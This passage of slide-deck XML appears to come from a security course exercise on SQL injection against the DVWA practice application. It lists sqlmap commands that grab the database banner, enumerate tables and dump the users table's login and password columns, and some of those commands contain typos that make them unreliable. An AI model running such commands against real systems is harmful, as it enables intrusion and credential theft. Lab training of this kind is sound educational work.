              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&gt; Databases = ssqlmap -u "http://youripaddress/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=your session ID; security=low" --dvwa</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&gt; Tables = sqlmap -u "http://youripaddress/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=your session ID; security=low" --tables</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF00"/>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9" name="Shape 1489"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1490" name="Google Shape;1490;p113"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="14185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Next, use a UNION-bases injection to perform the following tasks: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1491" name="Google Shape;1491;p11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92" name="Google Shape;1492;p113"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="730813"/>
            <a:ext cx="9144000" cy="1188600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Grab the database banner.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>List all available databases.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>List the tables of the dvwa database. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>List the columns of the users table. </a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Dump the login and password columns of the users table. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1493" name="Google Shape;1493;p113"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1919425"/>
            <a:ext cx="9144000" cy="2925900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&gt; Banner = sqlmap -u "http://youripaddress/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=your session ID; security=low"--banner</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&gt; Databases = ssqlmap -u "http://youripaddress/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=your session ID; security=low" --dvwa</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&gt; Tables = sqlmap -u "http://youripaddress/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=your session ID; security=low" --tables</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&gt; Columns of the users table =  sqlmap -u "http://youripaddress/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=your session ID; security=low" --current-db dvwa --dump</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF00"/>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7" name="Shape 1497"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1498" name="Google Shape;1498;p114"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="14185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Next, use a UNION-bases injection to perform the following tasks: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1499" name="Google Shape;1499;p11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00" name="Google Shape;1500;p114"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="730813"/>
            <a:ext cx="9144000" cy="1188600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Grab the database banner.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>List all available databases.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>List the tables of the dvwa database. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>List the columns of the users table. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Dump the login and password columns of the users table. </a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1501" name="Google Shape;1501;p114"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1919425"/>
            <a:ext cx="9144000" cy="2925900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&gt; Banner = sqlmap -u "http://youripaddress/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=your session ID; security=low"--banner</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&gt; Databases = ssqlmap -u "http://youripaddress/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=your session ID; security=low" --dvwa</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
